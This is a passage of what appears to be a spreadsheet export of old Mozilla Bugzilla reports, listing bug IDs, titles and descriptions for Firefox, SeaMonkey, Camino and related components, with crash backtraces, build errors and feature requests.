doesnot attempt to register the theme.
JS console reports the following
A Item Package appeared at: /Users/phiw/Library/Application
Support/Firefox/Profiles/1h0sbxi6.default/extensions/GrappleProP2.4.jar that we
know nothing about assuming it was dropped in by the user and configuring for
installation now. Location Key: app-profile
Error: Components.classes['@mozilla.org/xpcom/version-comparator1'] has no
properties
Source File:
file:///Applications/DeerPark.app/Contents/MacOS/components/nsExtensionManager.js
Line: 172
On starting up the browser does not attempt to open the jar file and no warning
window appears (wnat to install something... Install - whatever the exact wordings.
The theme does not appear in the Theme manager.
* Downloading a theme from https://addons.mozilla.org/
results in the following:
- the theme downloads and briefly appears in the Theme manager window.
- when download finished the theme vanishes out of the theme manager window.
Js console reports the following:
Error: Components.classes['@mozilla.org/xpcom/version-comparator1'] has no
properties
Source File:
file:///Applications/DeerPark.app/Contents/MacOS/components/nsExtensionManager.js
Line: 172
Error: installLocation has no properties
Source File:
file:///Applications/DeerPark.app/Contents/MacOS/components/nsExtensionManager.js
Line: 6327
After restarting the theme is not found in the extensions folder.
Reproducible: Always
Actual Results:  
no custom theme available
Expected Results:  
display the custom theme in the Theme Manager window allow to activate.
I previously submitted bug 301872: Previously installed and active theme does
not display browser reverts to default theme. Both bugs are related.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-394204</t>
  </si>
  <si>
    <t>Switch popup blocking to CHPermissionManager</t>
  </si>
  <si>
    <t>Created attachment 278818
switch
I thought I got everything but prefs (which are currently blocked) off of nsIPermisionManager but apparently not.</t>
  </si>
  <si>
    <t>SEAMONKEY-478800</t>
  </si>
  <si>
    <t>Drop-down 'View:' menu displays 'undefined' when you try and use Tags or Custom Views</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20081202 SeaMonkey/2.0a2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20081202 SeaMonkey/2.0a2
If you try and use any of the following View message options: Tags Custom Views
(View menu then Messages submenu) or the drop-down view menu and then close e-mail client then re-open seamonkeys e-mail client the drop-down 'View:' menu displays the word 'undefined'
It should also be noted that if you choose any of the Tags (e.g. 'Important') the drop-down 'View:' menu will immediately display the tag you chose e.g.
'Important'
If you then close the e-mail client and then re-open the e-mail client the drop-down 'View:' menu will then display the word 'undefined'
Unlike the Custom Views option which will make the drop-down 'View:' menu display the word 'undefined' immediately.
If you make a New personal Custom View and give a certain criteria then choose to use your custom view it will work even though the 'View:'
drop-down menu displays the word 'undefined'.
The only e-mail that will display is the one that meets the custom view requirement i set even though the drop-down       
'View:' menu displays the word 'undefined' in it.
Reproducible: Always
Steps to Reproduce:
To Reproduce Symptoms:
1. Send yourself an e-mail that has the words (for example) 'i really like technicians because they know a lot' in the subject line.
2. For your 'Inbox' Folder create a new custom view called 'Bens Custom' from the drop-down 'View:' menu and use the following criteria:
Goto Customize then goto New and create the following:
Drop-down menu 1:     Drop-down menu 2:     Data Entry Field:
Subject               Contains              technicians
3. goto the drop-down 'View:' menu then to the 'Custom Views' sub-menu and choose 'Bens Custom'
4. Quit seamonkey e-mail client (or seamonkey completely) and re-enter seamonkeys e-mail client
Actual Results:  
A. The drop-down 'View:' menu will display 'undefined' in it.
B. Only the E-mail that has the word 'technicians' in the subject line is displayed even though the drop-down 'View:' menu displays the word 'undefined'
Expected Results:  
Expected the drop-down 'View:' menu to show the name of the chosen Tag or the Custom View options name (including Newly Created Custom Views)
Sometimes if you click a couple of times (sometimes between 1 to 31 times) between the e-mail Folder you set the View Criteria up on and the Inbox and/or Drafts folder with the mouse the drop-down 'View:' menu might suddenly correctly
display the actual name of the Custom View when you have clicked on the e-mail folder that you decided to set the custom view up on (in this case E-mail folder = 'Inbox' Custom View  = 'Bens Custom').
NOTE: Not sure wether this constitutes a potential privacy and/or a security
      issue. User may want to use view message filter to filter out certain
      e-mails so as to not have other people in public areas see certain
      e-mail addresses or names of people but does not mind if public can see
      certain e-mail addresses. E-mail names and addressess could have
      sensitive information not allowed to be seen by others.</t>
  </si>
  <si>
    <t>goodfuture</t>
  </si>
  <si>
    <t>CORE-194468</t>
  </si>
  <si>
    <t>style context leaks from bug 114713</t>
  </si>
  <si>
    <t>The 'brad' tinderbox is reporting refcount leaks are up after this landing
including 4136 nsStyleContext leaks.</t>
  </si>
  <si>
    <t>CORE-374770</t>
  </si>
  <si>
    <t>Simplify nsSVGOuterSVGFrame::IsRedrawSuspended</t>
  </si>
  <si>
    <t>Created attachment 259206
patch
returning a PRBool makes for simpler calling</t>
  </si>
  <si>
    <t>SEAMONKEY-134758</t>
  </si>
  <si>
    <t>win32 static build broken</t>
  </si>
  <si>
    <t>check-in log broke windows static build
http://bonsai.mozilla.org/cvsquery.cgi?module=MozillaTinderboxAll&amp;date=explicit&amp;mindate=1017542280&amp;maxdate=1017545579
looks like it's Srilatha check-in caused the following err
nsMetaModule_mail.obj : error LNK2001: unresolved external symbol struct
nsModuleInfo  nsComm4xMailImport_gModuleInfo
(?nsComm4xMailImport_gModuleInfo@@3UnsModuleInfo@@A)
.\WIN32_O.OBJ\mail.dll : fatal error LNK1120: 1 unresolved externals
NMAKE : fatal error U1077: 'link' : return code '0x460'
NMAKE : fatal error U1077: 'C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE' : return code '0x2'
NMAKE : fatal error U1077: 'C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE' : return code '0x2'
NMAKE : fatal error U1077: 'C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE' : return code '0x2'
NMAKE : fatal error U1077: 'C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE' : return code '0x2'</t>
  </si>
  <si>
    <t>srilatha</t>
  </si>
  <si>
    <t>CORE-491722</t>
  </si>
  <si>
    <t>nsObjectFrame doesn't properly handle NPP_New failing for NP_FULL [@libgobject-2.0.so.0.2000.1@0x29302 ]</t>
  </si>
  <si>
    <t>Created attachment 376052
patch to create a test plugin
steps:
1. find a plugin that returns an error from NPP_New for mode=NP_FULL (you can apply the patch from this comment and build in modules/plugin/test to get one)
2. load your full page plugin e.g.: data:application/x-testhi
3. resize the window
Actual Results:
About to create new xtbin of 992 X 721 from (nil)...
firefox-bin: mozilla-central/widget/src/gtkxtbin/gtk2xtbin.c:316: gtk_xtbin_new: Assertion `parent_window != ((void *)0)' failed.
Program received signal SIGABRT Aborted.
0xb7f1c7f2 in ?? () from /lib/ld-linux.so.2
(gdb) bt
#0  0xb7f1c7f2 in ?? () from /lib/ld-linux.so.2
#1  0xb71a6085 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb71a7a01 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb719f10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
#4  0xb6da3e79 in gtk_xtbin_new (parent_window=0x0 f=0x0) at mozilla-central/widget/src/gtkxtbin/gtk2xtbin.c:316
#5  0xb4f16590 in nsPluginNativeWindowGtk2::CreateXtWindow (this=0xa73eaba0) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:408
#6  0xb4f169d4 in nsPluginNativeWindowGtk2::CallSetWindow (this=0xa73eaba0 aPluginInstance=@0xbfa0caf8) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:222
#7  0xb52f7e73 in nsObjectFrame::CallSetWindow (this=0xa98663a0) at mozilla-central/layout/generic/nsObjectFrame.cpp:989
#8  0xb52f835a in nsObjectFrame::DidReflow (this=0xa98663a0 aPresContext=0xa968b800 aReflowState=0xbfa0cba0 aStatus=1) at mozilla-central/layout/generic/nsObjectFrame.cpp:1094
#9  0xb52ec3ad in nsLineLayout::ReflowFrame (this=0xbfa0ceb4 aFrame=0xa98663a0 aReflowStatus=@0xbfa0cdbc aMetrics=0x0 aPushedFrame=@0xbfa0cdb8)
    at mozilla-central/layout/generic/nsLineLayout.cpp:990
#10 0xb527db44 in nsBlockFrame::ReflowInlineFrame (this=0xa98662ec aState=@0xbfa0d2b4 aLineLayout=@0xbfa0ceb4 aLine={mCurrent = 0xa98663e8 mListLink = 0xa986632c} aFrame=0xa98663a0 
    aLineReflowStatus=0xbfa0ce68) at mozilla-central/layout/generic/nsBlockFrame.cpp:3594
#11 0xb5283d72 in nsBlockFrame::DoReflowInlineFrames (this=0xa98662ec aState=@0xbfa0d2b4 aLineLayout=@0xbfa0ceb4 aLine={mCurrent = 0xa98663e8 mListLink = 0xa986632c} aKeepReflowGoing=0xbfa0d228 
    aLineReflowStatus=0xbfa0cf78 aAllowPullUp=1) at mozilla-central/layout/generic/nsBlockFrame.cpp:3415
#12 0xb52845ad in nsBlockFrame::ReflowInlineFrames (this=0xa98662ec aState=@0xbfa0d2b4 aLine={mCurrent = 0xa98663e8 mListLink = 0xa986632c} aKeepReflowGoing=0xbfa0d228)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:3262
#13 0xb5284b45 in nsBlockFrame::ReflowLine (this=0xa98662ec aState=@0xbfa0d2b4 aLine={mCurrent = 0xa98663e8 mListLink = 0xa986632c} aKeepReflowGoing=0xbfa0d228)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:2317
#14 0xb5285393 in nsBlockFrame::ReflowDirtyLines (this=0xa98662ec aState=@0xbfa0d2b4) at mozilla-central/layout/generic/nsBlockFrame.cpp:1897
#15 0xb52867d3 in nsBlockFrame::Reflow (this=0xa98662ec aPresContext=0xa968b800 aMetrics=@0xbfa0d85c aReflowState=@0xbfa0d6e8 aStatus=@0xbfa0d9ac)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:944
#16 0xb528a5a9 in nsBlockReflowContext::ReflowBlock (this=0xbfa0d838 aSpace=@0xbfa0d8d0 aApplyTopMargin=1 aPrevMargin=@0xbfa0ddbc aClearance=0 aIsAdjacentWithTop=1 aLine=0xa9866410 aFrameRS=@0xbfa0d6e8 
    aFrameReflowStatus=@0xbfa0d9ac aState=@0xbfa0dd34) at mozilla-central/layout/generic/nsBlockReflowContext.cpp:310
#17 0xb528255f in nsBlockFrame::ReflowBlockFrame (this=0xa98660c8 aState=@0xbfa0dd34 aLine={mCurrent = 0xa9866410 mListLink = 0xa9866108} aKeepReflowGoing=0xbfa0dca8)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:2990
#18 0xb528488d in nsBlockFrame::ReflowLine (this=0xa98660c8 aState=@0xbfa0dd34 aLine={mCurrent = 0xa9866410 mListLink = 0xa9866108} aKeepReflowGoing=0xbfa0dca8)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:2262
#19 0xb5285393 in nsBlockFrame::ReflowDirtyLines (this=0xa98660c8 aState=@0xbfa0dd34) at mozilla-central/layout/generic/nsBlockFrame.cpp:1897
#20 0xb52867d3 in nsBlockFrame::Reflow (this=0xa98660c8 aPresContext=0xa968b800 aMetrics=@0xbfa0e204 aReflowState=@0xbfa0e15c aStatus=@0xbfa0e468)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:944
#21 0xb5297c79 in nsContainerFrame::ReflowChild (this=0xa9cfaa90 aKidFrame=0xa98660c8 aPresContext=0xa968b800 aDesiredSize=@0xbfa0e204 aReflowState=@0xbfa0e15c aX=0 aY=0 aFlags=0 aStatus=@0xbfa0e468 
    aTracker=0x0) at mozilla-central/layout/generic/nsContainerFrame.cpp:821
#22 0xb52cedd8 in CanvasFrame::Reflow (this=0xa9cfaa90 aPresContext=0xa968b800 aDesiredSize=@0xbfa0e4c8 aReflowState=@0xbfa0e39c aStatus=@0xbfa0e468)
    at mozilla-central/layout/generic/nsHTMLFrame.cpp:656
#23 0xb5297c79 in nsContainerFrame::ReflowChild (this=0xa9844010 aKidFrame=0xa9cfaa90 aPresContext=0xa968b800 aDesiredSize=@0xbfa0e4c8 aReflowState=@0xbfa0e39c aX=0 aY=0 aFlags=3 aStatus=@0xbfa0e468 
---Type  to continue or q  to quit---q
aTrackQuit
(gdb) up
#1  0xb71a6085 in raise () from /lib/tls/i686/cmov/libc.so.6
(gdb) 
#2  0xb71a7a01 in abort () from /lib/tls/i686/cmov/libc.so.6
(gdb) 
#3  0xb719f10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
(gdb) 
#4  0xb6da3e79 in gtk_xtbin_new (parent_window=0x0 f=0x0) at mozilla-central/widget/src/gtkxtbin/gtk2xtbin.c:316
316	  assert(parent_window != NULL)
Current language:  auto currently c
(gdb) p parent_window
$37 = (GdkWindow *) 0x0
(gdb) up
#5  0xb4f16590 in nsPluginNativeWindowGtk2::CreateXtWindow (this=0xa73eaba0) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:408
408	  mSocketWidget = gtk_xtbin_new(gdkWindow 0)
Current language:  auto currently c++
(gdb) 
#6  0xb4f169d4 in nsPluginNativeWindowGtk2::CallSetWindow (this=0xa73eaba0 aPluginInstance=@0xbfa0caf8) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:222
222	          CreateXtWindow()
(gdb) 
#7  0xb52f7e73 in nsObjectFrame::CallSetWindow (this=0xa98663a0) at mozilla-central/layout/generic/nsObjectFrame.cpp:989
989	  window-&gt;CallSetWindow(pi)
(gdb)
For reference the instantiate path is something like this:
#0  0xb2afb67c in nsObjectFrame::InstantiatePlugin (this=0xac3603a0 aPluginHost=0xb0ecf944 aMimeType=0xa9bfbd38 application/x-test aURI=0xac247180)
    at mozilla-central/layout/generic/nsObjectFrame.cpp:896
(More stack frames follow...)
(gdb) bt
#0  0xb2afb67c in nsObjectFrame::InstantiatePlugin (this=0xac3603a0 aPluginHost=0xb0ecf944 aMimeType=0xa9bfbd38 application/x-test aURI=0xac247180)
    at mozilla-central/layout/generic/nsObjectFrame.cpp:896
#1  0xb2b020e5 in nsObjectFrame::Instantiate (this=0xac3603a0 aMimeType=0xa9bfbd38 application/x-test aURI=0xac247180) at mozilla-central/layout/generic/nsObjectFrame.cpp:1808
#2  0xb2eadce3 in nsPluginStreamListener::SetupPlugin (this=0xa9bdba80) at mozilla-central/content/html/document/src/nsPluginDocument.cpp:192
#3  0xb2eadd77 in nsPluginStreamListener::OnStartRequest (this=0xa9bdba80 request=0xa9b5f220 ctxt=0x0) at mozilla-central/content/html/document/src/nsPluginDocument.cpp:114
#4  0xb2886752 in nsDocumentOpenInfo::OnStartRequest (this=0xa9bfbd90 request=0xa9b5f220 aCtxt=0x0) at mozilla-central/uriloader/base/nsURILoader.cpp:290
#5  0xb5f93c7d in nsBaseChannel::OnStartRequest (this=0xa9b5f1f0 request=0xac3a90a0 ctxt=0x0) at mozilla-central/netwerk/base/src/nsBaseChannel.cpp:665
#6  0xb5fa7517 in nsInputStreamPump::OnStateStart (this=0xac3a90a0) at mozilla-central/netwerk/base/src/nsInputStreamPump.cpp:439
#7  0xb5fa82eb in nsInputStreamPump::OnInputStreamReady (this=0xac3a90a0 stream=0xac34d34c) at mozilla-central/netwerk/base/src/nsInputStreamPump.cpp:395
#8  0xb7c3054a in nsInputStreamReadyEvent::Run (this=0xa9bdb5e0) at mozilla-central/xpcom/io/nsStreamUtils.cpp:111
#9  0xb7c5f533 in nsThread::ProcessNextEvent (this=0xb6b7b830 mayWait=1 result=0xbf9589d0) at mozilla-central/xpcom/threads/nsThread.cpp:510
#10 0xb7bea779 in NS_ProcessNextEvent_P (thread=0xb6b7b830 mayWait=1) at nsThreadUtils.cpp:230
#11 0xb4ed0992 in nsBaseAppShell::Run (this=0xb6a551f0) at mozilla-central/widget/src/xpwidgets/nsBaseAppShell.cpp:170
#12 0xb4c3bce1 in nsAppStartup::Run (this=0xb6aa0790) at mozilla-central/toolkit/components/startup/src/nsAppStartup.cpp:192
#13 0xb7eb9860 in XRE_main (argc=1 argv=0xbf958ff4 aAppData=0xb6b0e380) at mozilla-central/toolkit/xre/nsAppRunner.cpp:3232
#14 0x080499f2 in main (argc=1 argv=0xbf958ff4) at mozilla-central/browser/app/nsBrowserApp.cpp:156
(gdb)
(they're from different sessions)</t>
  </si>
  <si>
    <t>SOCORRO-470527</t>
  </si>
  <si>
    <t>Some URLs don't show crash signatures when expanded on Top Crashers by Domain report</t>
  </si>
  <si>
    <t>I'm not sure what's going on here but some of the URLs within a domain don't expand to show any crash signatures.  It seems pretty random it can be a URL that has a large number of crashes or one with just a few.
(I also notice that the progress spinner doesn't seem to appear at all in the bydomain reports--not when expanding domains not when expanding URLs that do produce signatures and not when expanding URLs that don't produce any signatures.)
On the 3.0.5 report I've expanded facebook www.google.com mail.google.com and youtube and then tried to expand several of the URLs somewhat at random.  The following failed to produce signatures for me atm:
http://www.facebook.com/inbox/
http://www.facebook.com/ext/share.php
http://www.google.com/firefox
http://www.google.com/calendar/render
https://www.google.com/accounts/ServiceLoginAuth
http://www.google.com/reader/view/
http://www.youtube.com/my_videos_upload
https://mail.google.com/mail/</t>
  </si>
  <si>
    <t>CALENDAR-171291</t>
  </si>
  <si>
    <t>Events appear out of box in month view</t>
  </si>
  <si>
    <t>On an XP system with Mozilla calendar - build
2002091014 text for events in the month view
cross over the bottom line of the day box for
which they are suppose to be in.</t>
  </si>
  <si>
    <t>mkennedy</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-522445</t>
  </si>
  <si>
    <t>Adjust client.py for handling the creation of the 1.9.1 branch</t>
  </si>
  <si>
    <t>This is the critical part of creating 1.9.1 branch. iirc we have previously discussed and semi-agreed the following:
- Existing pulls of comm-central should revert to comm-central + mozilla-central.
- To get the 1.9.1 branch you must pull the new comm-1.9.1 (when it is created) which will pull mozilla-1.9.1 by default.
Does this sound about right?
I think Justin (Callek) was working on this - I sent him a private email a couple of days ago but not received a response yet so one of us may need to pick this up if we are to get it done before Thursday 22nd.
gozer has also made the suggestion:
&gt; client.py will just need to pick different defaults depending on which branch
&gt; it's on. Just made me think of something why not stick a top-level client.cfg
&gt; or some such file where client.py gets it's defaults from (branch revisions
&gt; etc) instead of in client.py itself. That way should be easy to keep client.py
&gt; 100% identical across branches and isolate the changes to that single config
&gt; file.
Which I think would probably be a good idea though we may need to consider as a separate bug.</t>
  </si>
  <si>
    <t>CORE-122363</t>
  </si>
  <si>
    <t>Implement matrix transform definition</t>
  </si>
  <si>
    <t>The 'transform'-attribute takes a list of 'matrix' 'translate' 'scale'
'rotate' 'skewX' and 'skewY' transformations.
We're still missing support for 'matrix'.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-415881</t>
  </si>
  <si>
    <t>ctrl+Q could close windows belonging to the same Web App instead of all Prism windows</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: prism/0.8
When more Web Apps are opened issuing ctrl+Q could close only the window(s) belonging to the focused Web App.
I understand the meaning of ctrl+Q as Quit (Web) App and not Quit Prism.
Reproducible: Always
Steps to Reproduce:
1. Open two Web Apps
2. Press ctrl+Q
Actual Results:  
Both Web Apps are closed.
Expected Results:  
Only one Web App could be closed leaving the other one running.</t>
  </si>
  <si>
    <t>peter.cunderlik</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-233787</t>
  </si>
  <si>
    <t>Crash on Save to Drafts with message attachment dragged from folder</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7a) Gecko/20040210
Start composing a new mail.  Drag a message from a folder into the attachment 
panel.  (Attachment panel shows only the icon no name -- bug 233785.)
Add an address subject and/or text then try to save:  Program crashes.  This 
is true for Save with the toolbar button with the menu item or by clicking the 
Close icon and then selecting Save from the prompt.
Adding a message to the email by use of Forward as Attachment does not exhibit 
this problem.  It also does not exhibit the symptom of bug 233785.  Other 
attachments do not exhibit this problem even those that *do* exhibit the 
symptom of bug 233785.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-393507</t>
  </si>
  <si>
    <t>Mac pages should use âŒ˜ instead of text command</t>
  </si>
  <si>
    <t>Many mac users don't know what the name of that key is -- flower and open apple (although no longer with the new iMac keyboard) are two popular alternative names.
Best to use a symbol that's on their keyboard instead of something potentially ambiguous.</t>
  </si>
  <si>
    <t>CORE-384803</t>
  </si>
  <si>
    <t>nsStringBundle::FormatStringFromID should return nsMemory allocated strings</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.4) Gecko/20070508 Iceweasel/2.0.0.4 (Debian-2.0.0.4-1)
Build Identifier: 
The FormatString function in nsStringBundle uses nsTextFormatter::smprintf but
nsTextFormatter does not use the shared nsMemory allocator. Instead it is recommended to free the memory it allocates using nsTextFormatter::smprintf_free.
FormatString through FormatStringFromID is being used in a lot of other modules that do not have access to nsTextFormatter (non MOZILLA_INTERNAL_API code). Lets instead use nsMemory based allocation for the result that we give out and free the string returned by smprintf ourselves!
Reproducible: Always</t>
  </si>
  <si>
    <t>prasad</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-395722</t>
  </si>
  <si>
    <t>Migrate spreadfirefox.com email from chameleon to dm-mail01/02</t>
  </si>
  <si>
    <t>lists.spreadfirefox.com currently runs on chameleon.  There's two major motivations for moving it:
1) chameleon is technically a development box.  The hardware isn't quite up to our production standards (lack of redundancy etc).  lists.spreadfirefox.com wound up running on it one of those times a long time ago when SpreadFirefox got hacked and it was the quickest place to move it at the time to get it up and running again the most quickly.  It was only supposed to be a temporary move and it never got moved elsewhere.  lists.spreadfirefox.com is the only production service running on this box.
2) We get a lot of spam on the abuse/postmaster/webmaster addresses on the spreadfirefox-related domain names because chameleon doesn't have very good spam filtering set up.  By moving these domains into the San Jose colo we can put them behind our primary mail relays which have very beefed up and actively-maintained spam and virus protection.
I don't know if there are any mailing lists on lists.spreadfirefox.com which are actively used so I'll need input from SpreadFirefox folks as to whether this needs to have a major outage window scheduled and announcements made or if I can just do it (mail will be queued and eventually deliver you'll basically just lose the Mailman web interface for the duration of the move).</t>
  </si>
  <si>
    <t>CORE-452518</t>
  </si>
  <si>
    <t>encapsulation improvements for nsCSSScanner</t>
  </si>
  <si>
    <t>Created attachment 335799
(rev 1) proposed patch
There's a bunch of stuff in nsCSSScanner.h that only nsCSSScanner.cpp needs to see.  Move it there.
Patch is on top of bug 452278.</t>
  </si>
  <si>
    <t>MARKETING-246420</t>
  </si>
  <si>
    <t>Testimonial: Website/Firefox</t>
  </si>
  <si>
    <t>Hi I just wanted to let you know that I am using Firefox at home and I love it.
No popups and it's fast! My kids are impressed and I wouldn't go back to ie for
anything. Thanks for producing such a wonderful browser. It's all you claim it
is and more. I'll be watching for more products from you guys. You're doing a
great job. People like me (on the down side of rich) really appreciate you all
making it possible for us to have some of the better things that we can't
usually afford. Thanks again K. Sandlin
(Our webmaster at the college told me about firefox and I will forever be grateful.)
A positive attitude may not solve all your problems but ...
it will annoy enough people to make it worth the effort.
Herm Albright (1876 - 1944)
Katherine Sandlin
Halifax Community College
sandlink@halifaxcc.edu
252-536-6343</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-361284</t>
  </si>
  <si>
    <t>Updating timestamps replaces long-nickname lines with just [00:00]</t>
  </si>
  <si>
    <t>See: http://twpol.dyndns.org/temp/cz_ts_2.png
All I did was toggle timestamps off then on again. I think it's getting confused on the nested tables or something similar.
This is critial - it is REMOVING the nested table entirely!</t>
  </si>
  <si>
    <t>MOZILLA_LABS-392899</t>
  </si>
  <si>
    <t>J2ME Client - Verizon XV6700 PPC</t>
  </si>
  <si>
    <t>we should produce builds for the XV6700 PPC :
http://www.mobiletechreview.com/Verizon-XV6700.htm</t>
  </si>
  <si>
    <t>CORE-529272</t>
  </si>
  <si>
    <t>Wrong loop in nsInputStreamTee</t>
  </si>
  <si>
    <t>The loop in nsInputStreamTee::TeeSegment() will not work for more than two iterations. See bug #513074#c20 and bug #513074#c24.</t>
  </si>
  <si>
    <t>TOOLKIT-431597</t>
  </si>
  <si>
    <t>Firefox crash after deleting History Item via Places Library [@ nsNavHistoryResult.h:429]</t>
  </si>
  <si>
    <t>Created attachment 318707
gdb data + DumpJSStack
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9pre) Gecko/2008043013 Firefox/3.0pre
Steps to reproduce: 
-&gt; Was trying to get a DumpJSStack for my crash in Bug 431346
-&gt; Open the Places Library - History -&gt; Show all History
-&gt; Select a few entries (i think my case around 10)
-&gt; Context Menu -&gt; Delete
--&gt; Crash
i don't know why the Crash Data is different and not the same as https://bugzilla.mozilla.org/show_bug.cgi?id=431346#c13
the debug output shows the warning and then crash) (see the attachment for the complete data + DumpJSStack()
WARNING: Attempting to register an observer twice!: file /debug/mozilla/toolkit/components/places/src/nsNavHistoryResult.cpp line 3829
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000001
0x140a868e in nsNavHistoryVisitResultNode::GetTime (this=0x15b4d350 aTime=0x1) at nsNavHistoryResult.h:429
429	  NS_FORWARD_COMMON_RESULTNODE_TO_BASE
(gdb) bt
#0  0x140a868e in nsNavHistoryVisitResultNode::GetTime (this=0x15b4d350 aTime=0x1) at nsNavHistoryResult.h:429
#1  0x140a4040 in nsNavHistoryResult::OnEndUpdateBatch (this=0x15b42b30) at /debug/mozilla/toolkit/components/places/src/nsNavHistoryResult.cpp:4069
#2  0x14080ae8 in nsNavHistory::EndUpdateBatch (this=0x11de600) at /debug/mozilla/toolkit/components/places/src/nsNavHistory.cpp:3623
#3  0x1408bf11 in UpdateBatchScoper::~UpdateBatchScoper (this=0xbfffb66c) at /debug/mozilla/toolkit/components/places/src/nsNavHistory.cpp:263
#4  0x1408bf25 in UpdateBatchScoper::~UpdateBatchScoper (this=0xbfffb66c) at /debug/mozilla/toolkit/components/places/src/nsNavHistory.cpp:264
#5  0x14081c72 in nsNavHistory::RemovePages (this=0x11de600 aURIs=0x15fb6400 aLength=34 aDoBatchNotify=1) at /debug/mozilla/toolkit/components/places/src/nsNavHistory.cpp:3820
....</t>
  </si>
  <si>
    <t>CORE-588735</t>
  </si>
  <si>
    <t>rtl text in UI displayed as mirror-image</t>
  </si>
  <si>
    <t>User-Agent:       Opera/9.80 (Windows NT 5.1 U en) Presto/2.6.30 Version/10.61
Build Identifier: Mozilla/5.0 (Windows NT 5.1 rv:2.0b4) Gecko/20100818 Firefox/4.0b4
firefox 4.0 beta 4 does not display rtl interface correctly the text and graphics are reversed in several places in the interface mainly the tabs main menu &amp; toolbar which causes the menus and awesomebar to align incorrectly but display correctly (i.e: not affected by the bug).
this is true for the two builds currently available in the trunk (beta4 candidates build 2+3)
Reproducible: Always
Steps to Reproduce:
1. install firefox 4 beta 4 in hebrew
2. run firefox
3.
i've changed the language pack to fit all the betas while beta 1 &amp; latest trunk were unable to show hebrew (various xul issues) beta 3 also suffers from this bug.</t>
  </si>
  <si>
    <t>avi3k3</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-373330</t>
  </si>
  <si>
    <t>Can't Browse Sunbird Addons</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a3pre) Gecko/20070309 Minefield/3.0a3pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a3pre) Gecko/20070309 Minefield/3.0a3pre
Load https://preview.addons.mozilla.org/en-US/sunbird/browse : Clicking Extensions or Themes will just load the sandbox flavor of the page. I'm assuming there is something to browse because a Sunbird extension (Date Calculator) is being recommended on https://preview.addons.mozilla.org/en-US/sunbird/addons/home
Reproducible: Always
Steps to Reproduce:
1. Go to https://preview.addons.mozilla.org/en-US/sunbird/browse
2. Click Extensions (from the left-bar or from the main page)
Actual Results:  
https://preview.addons.mozilla.org/en-US/sunbird/browse/*status*:1 is loaded
Expected Results:  
https://preview.addons.mozilla.org/en-US/sunbird/browse/*type*:1 is loaded</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-111831</t>
  </si>
  <si>
    <t>[HAVE FIX] Non valid expression for perl 5.005</t>
  </si>
  <si>
    <t>This lines should be
return 0 if scalar( grep { $_ = $self-&gt;sanitizeRegexp($_) $event-&gt;{'user'} =~
/^$_$/ } @{$self-&gt;{'allowusers'}} )
return      scalar( grep { $_ = $self-&gt;sanitizeRegexp($_) $event-&gt;{'user'} =~
/^$_$/ } @{$self-&gt;{'denyusers'}} )
without ( ) around grep arguments.</t>
  </si>
  <si>
    <t>daniele</t>
  </si>
  <si>
    <t>CORE-127430</t>
  </si>
  <si>
    <t>throw away nsImageGTK client side copy</t>
  </si>
  <si>
    <t>Patch throws away client side copy on Optimize().  Postscript printing now
does a LockImagePixels() which will read back the data from the server if
the image has been optimized.</t>
  </si>
  <si>
    <t>CORE-162507</t>
  </si>
  <si>
    <t>Default icon should not be set for embedding applications</t>
  </si>
  <si>
    <t>The new gtk2 icon code override the icon set by galeon with the mozilla icons.
To reproduce just try TestGtkEmbed and see that it use the mozilla icon.</t>
  </si>
  <si>
    <t>SEAMONKEY-89576</t>
  </si>
  <si>
    <t>Widget state manager should save current page data before OK callback</t>
  </si>
  <si>
    <t>Many pref windows register OK callbacks. Some blindly call
document.getElementById while other wiser codes fall back on the wsm page data.
If the wsm could be relied upon to save the page data when OK was clicked then
all pref panels could retrieve their data in a consistent manner. Unfortunately
the wsm saves the page data after calling the OK callbacks...</t>
  </si>
  <si>
    <t>CORE-449495</t>
  </si>
  <si>
    <t>Returning to frameset with back button loses focus</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
